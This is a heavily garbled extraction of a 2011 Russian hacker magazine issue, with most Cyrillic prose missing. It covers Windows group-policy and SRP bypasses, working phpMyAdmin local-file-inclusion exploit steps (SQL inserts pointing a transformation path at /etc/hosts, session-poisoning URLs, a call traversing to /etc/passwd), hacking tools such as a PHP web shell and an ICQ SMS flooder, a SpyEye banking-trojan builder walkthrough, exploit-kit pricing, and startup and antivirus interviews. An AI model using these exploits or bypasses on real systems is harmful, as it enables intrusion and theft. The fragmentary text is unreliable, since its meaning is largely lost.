"r":"http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin",
. ,
, .
, .

1000
, ,
. -
, . ,
:
{"t":"1311437340338","a":0,"s":1,"e":0,"d":[],"r":0,"XForms":0,"
captcha":1}
, IP-,
. ( ), IP-
cURL:
curl_setopt($curl, CURLOPT_PROXY, '12.34.56.78:80');
,
, ,
.
,
-
. , ,
, , ][-

, , ,
.
, ! z
065
GreenDog, DSecRG.ru, Digital Security (agrrrdog@gmail.com)
, Microsoft,

Windows, . , ,
, .
,
.
. - .
, .
,
, -, , -,
, .
.
.
?
, ( Group
Policy)
.
,
, . , .
,
, , ( Software
Restriction Policies). ?
. , ,

, . , , ,
. .
. , .
,
gpedit.msc (secpol.msc).
. , .
1.
, ?
:
1. .
2. - .
3.
.
4. ,
.
066
10 /153/ 2011
Win+U + Help + Jump to url = Explorer
, :
. .
5 .
, !
,
:
1. - .
2. .
3. - .
. .
,
(, ).
,
(
). .
, - ,
.
, . , , .
2. ?
, , ,
, .
, .
, , , .

( ):
:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\
HKEY_LOCAL_MACHINE\Software\Policies\
:
HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\
HKEY_CURENT_USER\Software\Policies\
- , (
userspace) (
advapi.dll) ,
/ .
, - ,
. ? , .
, .
! : -
,
10 /153/ 2011
3. SRP
,
SRP (Software Restriction Policies). ,
,
, . Blacklist Whitelist
,
: ( ), . ,
SRP,
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\
Windows\Safer\CodeIdentifiers\TransparentEnabled 0, , ,
. , ,
. (goo.gl/KNauh)
2005 SRP
GPdisable. DLL- , DLL.
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\
Windows\Safer\CodeIdentifiers\TransparentEnabled, SRP,
STATUS_OBJECT_NAME_NOT_FOUND. , , SRP .
Sysinternals GPdisable
( -
(bit.ly/nnzjN9). .
GPCul8or (bit.ly/nJAYri) Erica Rachnera , . ?
GPCul8or
(DisableTaskMgr, ProxySettingsPerUser )
. ,
. RegMon , ,
Policies.

(goo.gl/LE1M0). bpmtk (Basic Process
Manipulation Tool Kit),
.
4. BINARY PLANTING
GPdisable :
gpdisable.exe DLL ;
gpdisable.dll DLL SRP.
, ,
SRP ( GPdisable, bpmtk,
067
SRP
GPCul8or ).
.
DLL ( gpdisable.dll). .
DLL,
,
. !
Across
Security (bit.ly/ov7EAz), (
, ) .
Binary planting (
dll hijacking), :
?.
(
Word), , DLL SRP. , dll hijacking
Across GPdisable:

, Citrix XenApp.
? XenApp, , ( ). ,
- , .
. Citrix-
. -
. ,
Citrix-.
, ( ),
.
, , , (
, ). ,
,
, . , -
. ( , ),
: Citrix-
<Ctrl+Shift+Esc> Citrix-,
,
. Citrix.
068
Runas
1. gpdisable.dll ehTrace.dll.
2. .{2E095DD0-AF56-47E4-A099EAC038DECC24} ( , ).
3. ehTrace.dll .
4. Word, Excel ,
, PDF.
5. .
6. .
DLL!
8. , .
5.
,
, :
, SYSTEM;
;
Microsoft Office;
,
(Common Language Runtime).
, SYSTEM . :
- , ,
. , Win+U
( ). Utilman.exe ( ) SYSTEM.
. ,
c SYSTEM.
( Vista), Jump to url, C:\ explorer. ,
(View Source) ,
. ,
.

Microsoft Office. . . (
SRP), , , ,
. - exe.
:
Sub GOSHELL()
Shell "C:\windows\system32\regedit.exe", vbNormalFocus
End Sub
10 /153/ 2011
, , exe.
(goo.gl/kSPK3). MS Excel VirtualAlloc,
WriteProcessMemory CreateThread,
. DLL
, DLL , cmd.exe. ,
ReactOS. , SRP
DLL ( ),
,
LoadLibraryEx LOAD_IGNORE_CODE_AUTHZ_LEVEL
LoadLibrary, dll
white- !
6.
, ,
.
. ,
SRP.
. , , . , , ,
%TEMP% exe,
:
Set TEMP C:\
C:.
, ,
exe-:
, .
C:\windows\
system32\spool\Printers C:\windows\temp.
- , , , SRP . ,
, ,
AccessChk (goo.gl/jQ9tt).
7.
,
. ,
, . :
1. <Shift> + ,
Run as.
2. : runas /noprofile <
exe->.
, ,
, . ! . .
test_gpo3 regedit -
. , test_gpo2 exe (
),
regedit. ,
( RDP, ), ,
(
bit.ly/pXsBj6).
8. HTA
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SystemRoot%
CurrentVersion\SystemRoot%*.exe
CurrentVersion\SystemRoot%System32\*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\ProgramFilesDir%
Windows Program
Files .
,
. c , SRP-. ,

(goo.gl/BmBsm) HTA (HTML Application).
, :
1. :
<HTML>
<script language="vbscript">
msgbox "I'm dangerous VB Code!!!"
</script>
</HTML>
2. .hta (, execute_this.hta).
3. .
4. hta .
, MessageBox
VB- ? SRP , ,
. -
. HTA REG, MSC, HTA, CHM.
com= (
, ). ,
DOS.
10 /153/ 2011
, . . , ,
.

.

, . z
069
Pr0xor Kotov (https://rdot.org/forum/)
LOCAL/
REMOTE FILE
INCLUDE

,

LFI/RFI PHP-

include(_once) require(_once).

PHP-
, ,

.
070
LINKS
www.php.net/
set_include_path

set_include_path();
www.php.net/
unserialize

unserialize();
www.php.net/
virtual
virtual();
www.php.net/__
autoload
__autoload;
bit.ly/nWyefG
rdot.
org,

__autoload ;
bit.ly/pdY5zS

spl_autoload();
www.phpmyadmin.
net
phpMyAdmin;
bit.ly/nV1niG
LFI-
phpMyAdmin.
SET_INCLUDE_PATH()
, , set_
include_path(),
include_path
include(_once)/require(_once). , PHP-
,
include_path, .
,
set_include_path ( ini_set('include_path', []),
, include.
PHP-,
:
set_include_path($path . PATH_SEPARATOR . get_include_path());
include "myclass.php";
DVD

.
,
$path. , , , - ,
. ,
. ,
myclass.php .
10 /153/ 2011
, set_include_path(), ,
,
file manipulation (
), :
1. /tmp myclass.php (
777).
2. $path = /tmp/.
3. , , myclass.php /tmp.
, , ,
,
.
:
PHP-, ,
- PHP
- ,
www/nobody/apache. file
manipulation,
, ,
PHP.

, include(_once)/require(_once),
.
, PHP >= 5.1.2
__autoload,
include .
,
PHP:
If the class name is used e.g. in call_user_func()
then it can contain some dangerous characters such as ../.
It is recommended to not use the user-input in such functions
or at least verify the input in __autoload().
,
, , LFI/RFI. ,
/etc/passwd:
function __autoload($class_name) {
require_once $class_name . '.php';
}
call_user_func(array("../../../etc/passwd\0","test"));
, call_user_func() ,
.
unserialize(),
,
call_user_func().
.
, ,
- ../../../etc/
passwd.
, .
set_include_path() + __autoload()
set_include_
path(),
.
, - __
autoload, set_include_path() unserialize():
10 /153/ 2011
- spl_autoload() 80vul.com
function __autoload($class_name)
{
include $class_name;
}
...
set_include_path($path.PATH_SEPARATOR . get_include_path());
...
$cookie = unserialize($_COOKIE['auth']);
,
$path. , $path /etc/
auth O:7:"hosts":0:{},
/etc/hosts. PHP, rdot.org ( ). __autoload,
SPL-,
spl_autoload, , 2009 .
80vul.com:
<?php spl_autoload('info', '.txt'); ?>
info.txt.
VIRTUAL
PHP-, ,
virtual().
,  mod_include, Apache. CGI, shtml- ,
Apache. PHP- .
:
<?php virtual('info.php'); ?>

info.php.
GOOGLE CODESEARCH

google.com/codesearch, lang:^php$
: set_
include_path(), __autoload, spl_autoload(), virtual() unserialize().
071

$this->error_config_file = false;
$this->source_mtime = filemtime($this->getSource());
}

( PHP)
-.
,
phpMyAdmin was
unable to read your configuration file! Parse error,
include.
PHPMYADMIN
LFI phpMyAdmin sql.php
, virtual spl_autoload
, callback.
, virtual :
<?php
$path = 'virtual';
$path('myclass.php');
?>
... call_user_func():
<?
call_user_func('virtual', 'myclass.php');
?>
EVAL == EVIL
,
, eval('?>' . trim(file_get_contents('info.txt'))).
, , include/require, .
-, ,

. -, file_get_contents()
eval() allow_url_include, ,
allow_url_fopen = On (
), .
,
phpMyAdmin <=
2.11.9 unserialize() arbitrary PHP code execution exploit (bit.ly/qW94f9).
phpMyAdmin

unserialize(), load
PMA_Config .
load:
, ,

phpMyAdmin. , phpMyAdmin
, ][
. , , , , ,
.
, ./
libraries/display_tbl.lib.php. phpMyAdmin
3.3.10.1 3.4.3 .

Security (PMASA-2011-8).
:
advisory, , 3.3. (
,
).
:
./libraries/display_tbl.lib.php (phpMyAdmin 3.3.10)
if ($GLOBALS['cfgRelation']['mimework']
&& $GLOBALS['cfg']['BrowseMIME']) {
if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) ... ) {
...
-$include_file = $GLOBALS['mime_map'][$meta->name]
['transformation'];
+$include_file = PMA_securePath($GLOBALS['mime_map'][$meta->name]
['transformation']);
$eval_result =
eval('?>' . trim(implode("\n", file($this->getSource()))));
...
if ($eval_result === false)
$this->error_config_file = true;
else
{
072
__autoload php.net
10 /153/ 2011
phpMyAdmin
...
require_once './libraries/transformations/' . $include_file;
,
:
1. $GLOBALS['cfg']['BrowseMIME'] == true. , , ./libraries/config.
default.php
true. .
config.default.php, .
2. $GLOBALS['cfgRelation']
$GLOBALS['mime_map']. $cfgRelation
, ,
, .
, PMA_getRelationsParam(),
, , ./libraries/relation.
lib.php:
function PMA_getRelationsParam($verbose = false)
{
if(empty($_SESSION['relation'][$GLOBALS['server']]))
{
$_SESSION['relation'][$GLOBALS['server']] =
PMA__getRelationsParam();
}
$GLOBALS['cfgRelation'] = $_SESSION['relation'[$GLOBALS['server']];
...
return $_SESSION['relation'][$GLOBALS['server']];
}
$_SESSION relation[$GLOBALS
['server']], PMA__
getRelationsParam. ,
. PMA__getRelationsParam
$cfgRelation,
$cfg['Servers'][$i]['pmadb'].
,
$cfgRelation false null.
$cfg['Servers'][$i]['pmadb']
, $cfgRelation . ,
$GLOBALS['cfgRelation']
,
10 /153/ 2011
$_SESSION phpmyadmin (
-,
$cfg['Servers'][$i]['pmadb']).
,
$_SESSION parse_str(), Mango,
phpMyAdmin,
. $cfgRelation .
, ,
$GLOBALS['server']. ,
. phpMyAdmin
, 1.
, , ,
, phpMyAdmin':
'pmaUser-' . $GLOBALS['server'] 'pmaPass-' . $GLOBALS['server'].
.
$GLOBALS['mime_map'] PMA_
getMIME():
./libraries/transformations.lib.php
function PMA_getMIME($db, $table, $strict = false)
{
...
$com_qry = '
SELECT `column_name`,
`mimetype`,
`transformation`,
`transformation_options`
FROM ' . PMA_backquote($cfgRelation['db']) .
'.' . PMA_backquote($cfgRelation['column_info']) . '
WHERE `db_name` = \'' . PMA_sqlAddslashes($db) . '\'
AND `table_name` = \'' . PMA_sqlAddslashes($table) . '\'
AND ( `mimetype` != \'\'' . (!$strict ? '
OR `transformation` != \'\'
OR `transformation_options` != \'\'' : '') . ')';
return PMA_DBI_fetch_result($com_qry, 'column_name',
null, $GLOBALS['controllink']);
}
, $GLOBALS['mime_map']
,
. , . ,
PMA_displayTableBody.
073

, table_name .

PMA_getMIME $GLOBALS['mime_map'].
2. $_SESSION['relation'] $cfgRelation.
.
PMA,
:
http://phpMyAdmin/index.php?token=< >
&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1
&_SESSION[relation][1][mimework]=1&_SESSION[relation][1]
[db]=test&_SESSION[relation][1][column_info]=pmatest

.
3. , http://
phpMyAdmin/sql.php?db=test&table=integer&token=< >.
, integer a /etc/hosts.
__autoload
, sql.php:
//
require_once './libraries/display_tbl.lib.php';
...
// , $cfgRelation
if (strlen($db)) {
require_once './libraries/relation.lib.php';
$cfgRelation = PMA_getRelationsParam();
}
...
PMA_displayTable($result, $disp_mode, $analyzed_sql);
PMA_displayTable ./libraries/display_
tbl.lib.php, , ,
PMA_displayTableHeaders, $GLOBALS['mime_map'].
:
,
:
1. phpMyAdmin .
, sql.php :
CREATE TABLE 'test'.'integer' ( '1' INT NOT NULL ) ENGINE = MYISAM ;
INSERT INTO 'test'.'integer' ( '1' ) VALUES ( '1' );

$GLOBALS['mime_map']:
CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,
'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL ,
'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,
'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;
INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',
'transformation', 'transformation_options', 'db_name',
'table_name') VALUES ('1', '1', '../../../../../../../../etc/hosts',
'1', 'test', 'integer');
transformation
, db_name ,
074

, ,
3.4.x- phpMyAdmin 3.4.3.1
.
advisory PMASA-2011-10. , , ,
sql.php:
$mime_map = PMA_getMIME($db, $table);
...
foreach($mime_map as $transformation) {
$include_file = $transformation['transformation'];
...
if (file_exists('./libraries/transformations/' . $include_file)) {
$transformfunction_name = str_replace('.inc.php', '',
$transformation['transformation']);
...
require_once './libraries/transformations/' . $include_file;
,
:
1. $GLOBALS['is_ajax_request'] == true . ,
ajax_request.
2. 0 == $num_rows || $is_affected. : ,
- sql-. ,
(
).
, ,
PMA_getMIME $mime_map
phpmyadmin $_SESSION.
phpmyadmin phpMyAdmin 3.4.3.1,

.
,
phpMyAdmin 3.4.3:
1. phpMyAdmin :
CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,
'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL ,
'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,
'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;
10 /153/ 2011
LFI- phpMyAdmin
INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',

'transformation', 'transformation_options', 'db_name',
'table_name') VALUES ('1', '1', '/../../../../../../../etc/hosts',
'1', 'test', '< , >');
2.
$cfgRelation:
http://phpMyAdmin/index.php?token=< >
&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1
&_SESSION[relation][1][mimework]=1&_SESSION[relation][1][db]=test
&_SESSION[relation][1][column_info]=pmatest
3. :
http://phpmyadmin/sql.php?do_transformations=1&ajax_request=1
&table=< >&db=test&token=< >
, , ,
$cfgRelation.
,
10 /153/ 2011
phpMyAdmin shared-. :
, ,

MySQL phpMyAdmin.

, . , ,
, / ,
. ,
PHP,

.
,
, phpMyAdmin, . ,
.
, .
, ,
, . z
075
/ X-TOOLS
(icq 884888, http://snipper.ru)
X-Tools
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
profexer
:
c0n Difesa
:
Zdez Bil Ya
DEFBRUTE
PHP-- P.A.S.
ICQ SMS-
defbc.exe <server ip> <server port>

-. . : P.A.S. (php web-shell)
rdot.org profexer.
,
:
1. .
2.
: bit.ly/r36L3k
.
1.
3. , , ,
.
4. SQL- MySQL, MSSQL, PostgreSQL,
.
5. Bind port (Perl).
6. Back-connect (Perl).
7. Port scanner (PHP).
8. BruteForce /etc/passwd SSH,
FTP, POP3, MySQL, MSSQL, PostgreSQL
.
9. PHP-
.
10. (15 ).
www.defec.ru/node/4
.
,
:
.
Zdez Bil Ya.

, ICQ sms flooder ,
ICQ. :
,
;
ICQ 5 ;
(** ,
icq) **;
;
( ).
,
, 160
() 70 (, ).

.
, ICQ,
sms,
.
.
ICQ sms
check SMS.
:
, ,

,
.

MD5-.

, . ,

- ?

. .
,

,
.
, DefBrute
MD5-.
.
(DefBrute v1.0.exe)
, . DefBrute ,
:
076
10 /153/ 2011
X-Tools
:
Android
FACENIFF:
:
bponury
FaceNiff
Firesheep,
HTTP-
.
Firesheep Firefox,
Facebook, Twitter,
Flickr Amazon.com ,
.

, .
FaceNiff
Firesheep
! -, apk- (faceniff.ponury.net),
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
SLESH
:
Flame of Soul
:
xmadstyle
MICSPY SE
, X-Tools

MicSpy .

MicSpy SE
(Stream Edition).
,
, , .

:
;
;
:
UPX
- 5632 ;

;

WinAmp;

256 .
, : ,

http://[IP ]:4545.
back
connect' .
10 /153/ 2011
Android-
-
: FaceBook, Twitter,
. . 10. , ,

( : bit.ly/qbzwGh). ,
,

.
FaceNiff Android
-. , (WEP,
WPA WPA2).
EAP.
EMAIL- XSPRYT
MD5
ONLINE SCANNER

XSpryt.

email-
, , .
, !
:
;
-;
;
( );
;
;

.
:
1. exe-.
2. ,
.

: grabber.exe -h
winne.com -p 80 -t 3000. :
h ( http://);
p ;
t - .
mail.
txt; ,
, link.txt.
MD5 MD5 Online Scanner,

xmadstyle -.
,
MD5- -.
:
( 250 );

;
-
;

;

;
GUI, .
, : c0llision.net, tmto.org, www.md5this.
com, md5.hashcracking.com, md5online.net,
hashkiller.com 30 .
,
:
[MD5] ;
[DATA] (, . .);
[TEXT] ();
[SERVICE] , .
077
MALWARE
SPYEYE

SpyEye.
,
, . , SpyEye
, .
INFO
SpyEye
v1.3.25
14.03.2011.

,
,
,

.
078

:
.
DDoS, ,
. SpyEye
, . SpyEye ,
.

SpyEye (,
, , ). , .
,
. - ,
.
10 %.
. SpyEye .
,
. /
, -
.
.
SpyEye GNU/Linux Debian 5.0.
-
, ssh- .
VirtualBox.

, . - PHP,
MySQL-.
. .
gate.php.
10 /153/ 2011
BackConnect Server (for SOCKS5 & FTP).

SOCKS5 FTP,
BackConnect- GNU/Linux.
Collector.
GNU/Linux, .
, ,
TCP Sausages.
LZO-.

MySQL. ,
GNU/Linux MySQL. ,
SSH- .
RDP BackConnect Server.
OS GNU/Linux.

MySQL.

1. Formgrabber CP (Collectors GUI). ,
PHP, .
,
. .
2. Builder. ,
exe- . :
Encryption key , config.bin.
.
Clear cookies every startup ,
( ) cookies IE FF.
FF , cookies ,
FF cookies cookies.sqlite.
Delete non-exportable certificates
Windows ( IE)
. , ,
, *.pfx, .
SpyEye .
,
.
, .
Dont send http-reports HTTP- . , HTTPS-
( HTTP- Basic-).
Compress build by UPX ,
UPX.
, .
Make build without ZLIB support HTTP 1.0 FF-
Accept-Encoding, -
( gzip, deflate).
SpyEye zlib,
. zlib.
1516 K (
UPX ). ,
FF, .
Make LITE-config ,
config.bin , webinjects, screenshots
( customconnector.dll). ,
config.bin .
, .

.
10 /153/ 2011
.
EXE name ( ).
Mutex name mutex,
.
Anti-Rapport , Rapport Trusteer. ,
SpyEye Rapport . ,
. ,
, Rapport,
Zeus . RKU,
,
Anti-Rapport.
Screenshots.
screenshots. .
. .
,
, .
:
%URL_MASK% %WIDTH% %HEIGHT% %MINIMUM_CLICKS%

%MINIMUM_SECONDS%
URL_MASK URL. URL , ,
.
, .
,
(,
). : -
FTP
079
MALWARE
, Hooked Function:
GRABBED DATA. . .)
H L ,
data_before data_after.
data_before, data_inject, data_after

:
1. data_before
data_after , ...
data_inject data_before.
2. data_after
data_before , ...
data_inject data_after.
3. data_before data_after,
... data_before
data_after data_inject.

( ,
HTTP-, URL_MASK)
.
Client : Builder : webinjects. webinjects.
HTTP/HTTPS-.
, Zeus. set_url. ,
Zeus.
: set_url, data_before,
data_inject, data_after ( data_end , data_):
set_url
, . Zeus,
, * #.
(
G):
G ,
, GET.
P ,
, POST.
L data_before data_after
.
data_inject. (

- BOA HTTP 1.0 (
HTTP SpyEye
Mozilla Firefox). (*.css, *.js)
- , ContentEncoding , .
, ,
Invalid Content, .
-, SpyEye,
( data_before, data_inject data_after)
css- js-.
Builder: serial.txt.
,
. : !
Client : Builder : collectors.txt.
collectors.txt. , (
Enter):
ip:port IP, SpyEye Collector
PORT,
. IP . ,
, - , (80 443),

.

, , (
0,1 ).
,

.
SPYEYE
ZEUS
data_before, data_inject, data_after SpyEye
, Zeus . Zeus
CSS- JS-. ,
SpyEye, , set_url .css .js ( ).
SpyEye H Zeus
HTML- HTTP-. SpyEye #
* ( set_url). Zeus #
.
080

. .
Client : Plugins : webfakes. webfakes HTTP- HTTPS-
- IE
FF.
, Zeus,
:
entry "WebFakes"
%URL_MASK% %URL_REDIRECT% %FLAGS% %POST_BLACK_MASK%
%POST_WHITE_MASK% %BLOCK_URL% %WEBFAKE_NAME%
%UNBLOCK_URL%
End
10 /153/ 2011
FF .
API nspr4, POST-,
,
4 .
POST-,
4 HTTP- ( HTTP).
.
DDoS. , DDoS- - .
:
type target port time.
type target port time.
type DDoS. :
slowloris/ssyn/udp.
target IP ,
.
port , DDoS ( UPD DDoS
0, ).
time , DDoS ( UDP/SSYN ,
Slowloris ).
DDoS (
, ). DDoS Slowloris
( 80-).
.
Client : Plugins : ccgrabber.
, POST-
.
Luhn algorithm.
, POST- .
CC
.
ffcertgrabber. SpyEye
Windows. Firefox
.
FF.
, .
( ).
FF.
Socks5 BackConnect. SOCKS5-
BackConnect. ,
Socks.
10 /153/ 2011
FTP BackConnect. FTP-

BackConnect-.
, FTP-.
RDP BackConnect. RDP-
BackConnect-. ,
RDP.

(
). Portable- TotalCommander,

( ).
.
.

(RDP).
Windows mstsc.exe Remote Desktop Connection.
:
x64-;
;
Win7 Starter ( Starter);
, !

, ,
.
.
, ,
.
, ,
. SpyEye ,
,
. SpyEye

. ,
, . z
081
MALWARE
A.I.
,

. ,

,
. - , ,
. ,
:).
, ,

,
, , .
, Anonymous LulzSec,
, , , , ,
.
,
.
, ,
, , ,
.
082
10 /153/ 2011

2000- .
, ,
.
-
,
. -
, ,
.
,
(
)
. , -.
: ,
, . ,
, ,
.
, ,
,
.
, .
,
, , ,
, , , , , 1001
. ,
, 2010
. 60 .
Trojan-Spy.
, ,
,
.
? , ,
, ,
.
,
,
- .
, ,
.
, ,
.
, ,

.

, ,
, . ,
,
, .
,
.

: , , . ,
- SpyEye Zeus,
,
,
,
-,
. . ,
. Zeus, SpyEye

.

, .
,
!
?
-
,
-

10 /153/ 2011
083
MALWARE
SpyEye
,

Google
,
.
,
, . ,
-, , -
.
:
, . , .
- ,
- .
- ,
. -
, . ,
, , ,
, ,
, .
. DdoS, , ,
- . .

. .
,
.
, ,
-
,
0day- Windows.
, , , , ,

(.
).
, , .
.
: , . ,
: .
, : ,
. ,
,
, ,
(,
, ?). . 10
% .
,
, , .
, ,
, (. ), FTP ( ).

, , ,
, ?!
084
10 /153/ 2011
Exp
, . , ,
, ,
. , , Zeus,
, , . !
(
) - 1000 .
, : , ,
,
.
,
, . .
, , .
,
, ,
100
. , , ,
.
,
,
, ,
, .
,
, ,
,

,
,
. ,
, , - .
() .
500 . , .
, , .
(
) - -
( -), . , . , ,
. -, ,
. ,
, ,
. 13001500 .
,
, ,
- . , ,

.
:
, ,
, (, ,
,
. . .).
, 500 .
, 800. ,
,
, ,

?
,

HOW TO NOT TO DO
, , .
( )
, :
, .
:
, . ,
:
. , :
. , ,
, .
,
. .

. : , , .
10 /153/ 2011
085
MALWARE
,
,
086
, ,
.
, , ,
, ,
. !
. , ,
,
. 200 ,
, , .
,
, - .
.

. -,
:
. :
? ,
: . .
,
, : 1000
? !.
,
.
- , , . ,
,
.
,
: , ! ,
! ! ? ?! ! , ! !
, ,
.
, , .
:
, . , ?!
, .
. 1015 % . ?

Western Union (, ,
)
-
. ,
,
.
?
. ,
,
60007000 . , 1000 ,
, , . , .
, 1015 % ,
500 000 . 7000?
, . , , ,
, ,
, ,
- .

, ,
,
. ,
27
. ? ,
.
,
, .
, ,
.
:
,
, ,
, ,
( , ,
. . .).

- , .
- :
,
. z
10 /153/ 2011
-
?
- : , ,

.
,
/,
.
Black Hole
.
.

(TDS),

.
10 /153/ 2011
-

.
Black Hole
Paunch
.

, , ,
, .
Black Hole
. $1500,
$ 1000 $ 700.
BlackHole Exploit Kit 1.0.2

,
thehackernews.
com. 2
ZeuS.

7
,
273 .
087
088
10 /153/
/
2011
Mifrill (mifrill@gameland.ru)
, , ,
.

,
. ! ,

.
,

, .
!
10 /153/ 2011

: Facebook ,
Amazon , Twitter
.
, ,
.
.
, ,
, , ,
. ,
, 90 100
, ,
.
. ,
.
,
.
, , ,
, Apple

. ,
.
,
,
,
? -,
,
,
? ,
,
,
, ?

. ,
,
.
. , ,
, ,
.
,
, ,
,

, .
089

Startup Weekend
SumIT
Startup Point
:
: russia.startupweekend.org
: ,
:
:
: sumit.ru
: -
:
: Startup Point
: startuppoint.ru
:
:
Startup Weekend, ,
.
,
,
-, ,
IT .
, . .
,
, . , 12-
-,
, - ,
$100 000
.
( 75 %
). .

2500 ,
250 , 100 , 120
. SumIT
. ,
. SumIT
Weekend, Startup
Marathon. ,

. -
,
IT-,
SumIT. Invest Fest, . Invest
Fest -
IT-: Runa Capital, Almaz, ABRT, , Mail.
ru Group, EMC, Intel, , RSV Venture Partners.
Startup Point

-
,
10 000 , 2500+
, 200+
. Startup Point $3
.
.
, ,
.
, , .
Elevator Pitch
(2- )
Success
Story.
. , ,
.

Almaz Capital Partners
Runa Capital
: almazcapital.com
:
: ~$100500
: runacap.com/ru
:
: $500
: company.yandex.ru/public/start/factory.xml
:
: $50100 .

, 2008 .
(
Almaz Capital Partners Runa Park,
Runa Capital; 2010
; Russian
TechTour 2004). 2008 .
$125 , $60 Cisco UFG
Asset Management.
Appollo Project, Parallels .
.

. 2010-
Qik ( ),
Skype 2011 $150 .

2010 .
Parallels Acronis

Almaz Capital Partners .
Runa Capital --
.
. Runa Capital
, , , . Runa Capital
20 . -,

. Runapark. Runa Capital
$1 (
).
., ,

,
-, ,
.

$50150 .
, ,
, ( , ),
, ,
,
, ,

.
,
.
090
10 /153/ 2011

, , , .
.
.
,
, , .
HackDay
Harvest
StartUp Week
: -
: hackday.ru
:
:
: GreenfieldProject
: greenfield-project.ru/harvest
:
:
: STARTeurope, Initial Factor,

: startupweek2011.com
: ,
: 3 7 2011 .

HackDay
.

2
. HackDay
Yahoo! 2005 .

-. .
, , .
, ,
- . ,
HackDay
. , HackDay , IT, , ,
, ,
.
.
Harvest
HackDay.

- .

,
. Harvest
, .
,

.
GreenfieldProject
-, ,
-.
,
.

, StartUp
Week Europe Festival

. ,

, ,
, , , .
. ,
StartUp Week 70
-,
.
: ,
EDventures Holdings, (
Skype), , last.fm,
( SeedCamp
- ),
, Almaz Partners, ,
ABR .

, .
,
, .

. .
Microsoft
ABRT Venture Fund
: ms-start.ru
:
: $30 $100 .
: glavstart.ru
:
: $100 .
: abrtfund.com/rus
:
: $1 5

2010
Microsoft .

-.
. ,

, , ..
,
.
150
,
.
$30
$100 . , $100 .
PiratePay,

.

,
.
, ,
Startup Weekend .
,
,
12
$100 . ,
,
. ,
,
Facebook .

Facebook
.

, Aelita Software,
,
2004 .
Quest Software $115 .
Aelita Software
. ABRT

.
, .
, ABRP ,

. (Mangrove
Capital Partners) (Insight Venture
Partners OpenView Venture Partners) , ,
$100 .
ABRT .
10 /153/ 2011
091

.
,
.
Facebook Google,

, .

:

? , -

,
, -
, ?
,
.
,
.
,
, ,

.
285- .
.
, .
,
Jelastic ,
Java-,
Java
(SaaS).
IT-, -,

. -, b2b-.
,
, ,
.
, , ,
.

, ,

-.
,
Runa Capital (runacap.com).

? , $50100,
? ?
, ,

?

, ,
,
,
.
-,

, .

,
.
092

?
,
? ,

, ?

social, local, mobile, ,
.

-,
.
.
,
Runa Capital $500 .

,
,
.
, , .

, .
,

.

.
10 /153/ 2011

Runa Capital .
:
Telefir (telefir.ru)
- .
, Twitter.

. , ,
.
, .
Jelastic (hivext.ru), PaaS-, Java-

.
, 3 % .
Metabar (metabar.ru)

.
,
, .
Travelmenu (travelmenu.ru)
Almaz Capital.
3
,
290 . , 100
500 .
, .
,
, ,
Alawar Qik.
Almaz Capital Skype
( $150 . . Mifrill).
IT
Q ?
, ?
, ,
?
,
,

? ,
,
, ,
.
, ,
,
Runa Capital . ,

: Parallels, Acronis,
Abby, Kaspersky. ,
.
Mail.ru Yandex
IPO .
Startup Weekend
10 /153/ 2011
Startup Point
.

,
, - .
,
, , ,
. , , .
. ,

STARTUP
WEEKEND, STARTUP POINT, SUMIT, HACK DAY
. .?
?
,
,

-.
,
, .

,
, , , ,
,
, ,
. , ,
, ,
...
: ? z
Startup Week
093
2007
.
2009
ESET
.
security: CONFidence,
CARO, PHD .

100% Virus Free Podcast.
094
10 /153/ 2011
Eset/Russia
VIRUS
FREE

ESET/RUSSIA
, ,
.
, ,
.
,
,
?

ESET.
10 /153/ 2011
MAN

? ,
,
? ?
, , .
-,
- 1998
.
580
( 8- 8080)
. ,

.
,
, ,

. ,
CD-ROM
13,
.
,
,
095
/
WinNuke, ,
, DoS
. , ,
, ,
.

, -
.
, , ,
,
.
,
Windows
.

. -
, ,
PoC perl.
,

. ,
,
,
,
,
, .
,
WinNuke, .

.
, ,
, . ,
, ,
JME,
Java.
,

, , ,
. Python,
,
. ,

, ,
++. , ++
,
Python.
, , ,
.

?
,
?
A
096

, ,
,
,
.
, , ,

. ,
- ,
, TLD3/4, Rovnix,
.

-,

.

?
-

?
,
, - ,
.
,

.
-,
,
PPI.

.
,

ESET LETA
GROUP, ESET?
ESET?
,
, ,
.

,
.

,

.

, : ,
, , -, -
. ,

.

?
,
?
ESET
?
, ,

NDA. ,
,
. , ,

: ,
.
, , , ,

, .
: ESET
?

?

, , ,
. ,
,

.
,
-
. , ,

,
.
?
-
?
,
:
Hex-Rays. ,
, , ,
,
,
. IDA
Pro

Hiew,
-
.
Immunity Debugger
Python API.
,
, WinDbg ( , ,
Python- pykd).
SofIce,

NT.
- Zynamics BinDiff.
,

.
,
.

-

.
?
10 /153/ 2011
Eset/Russia
,
,
. Wiki,

,
,

. ,
Malware Analysts Cookbook
,

,
?
,
, .
,

, - .

,
,

.

.
,

, , 27%
73% . ,
, ,
. ,

.
,
?
,

.

, ,
,
,
- ,
,
.
,
.
,
.
,
reddit Reverse
Engineering (www.reddit.com/r/
ReverseEngineering).
.
,
.
10 /153/ 2011
-
?

.
, ,

.

,
.
:
,
, ,

. ,

wasm.ru. , ,
